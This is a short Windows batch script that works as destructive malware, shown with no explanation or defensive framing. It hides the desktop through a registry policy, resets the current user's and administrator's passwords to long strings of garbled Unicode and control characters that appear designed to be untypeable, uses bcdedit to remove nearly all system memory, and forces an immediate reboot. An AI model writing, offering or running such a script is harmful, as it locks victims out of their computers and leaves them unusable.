@echo off

REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDesktop" /t REG_DWORD /d 1 /f > nul


net user %username% FerkdFDTGK532sd6sq2df6sdféTgksdC46dc48e6sn4kj8sz3ggtyj9sd324g3dfjhdfdfsaa7sd1fxc74e14y5ik79sd541iuk54sqd4o8gh4b5sd48fgf54sdf5sd6f4

net user %username% Rccxx°mù$zez☺┼╖▒e+♀↓♥☻pktlafdpythkiPASSWORD

net user administrator ☭̷̛̞͕͆͑̔̿̀͂̍͗̐̃̀͘̕͘☭̷̛̞͕͆͑̔̿̀͂̍͗̐̃̀͘̕͘☭̷̛̞͕͆͑̔̿̀͂̍͗̐̃̀͘̕͘

net user %username% ☭̷̛̞͕͆͑̔̿̀͂̍͗̐̃̀͘̕͘☭̷̛̞͕͆͑̔̿̀͂̍͗̐̃̀͘̕͘☭̷̛̞͕͆͑̔̿̀͂̍͗̐̃̀͘̕͘☭̷̛̞͕͆͑̔̿̀͂̍͗̐̃̀͘̕͘

net user %username% AA☭̷̛̞͕͆͑̔̿̀͂̍͗̐̃̀͘̕͘☭̷̛̞͕͆͑̔̿̀͂̍͗̐̃̀͘̕͘☭̷̛̞͕͆͑̔̿̀͂̍͗̐̃̀͘̕͘AA

net user administrator no☭̷̛̞͕͆͑̔̿̀͂̍͗̐̃̀͘̕͘☭̷̛̞͕͆͑̔̿̀͂̍͗̐̃̀͘̕͘☭̷̛̞͕͆͑̔̿̀͂̍͗̐̃̀͘̕͘no



for /f "skip=1" %%p in ('wmic os get TotalVisibleMemorySize') do ( 
   set system_ram=%%p
   goto :end
)
:end

set /a "c=%system_ram% - 28"
bcdedit.exe /set removememory %c% 

timeout /T 3 /nobreak > nul

shutdown -r -f -t 00












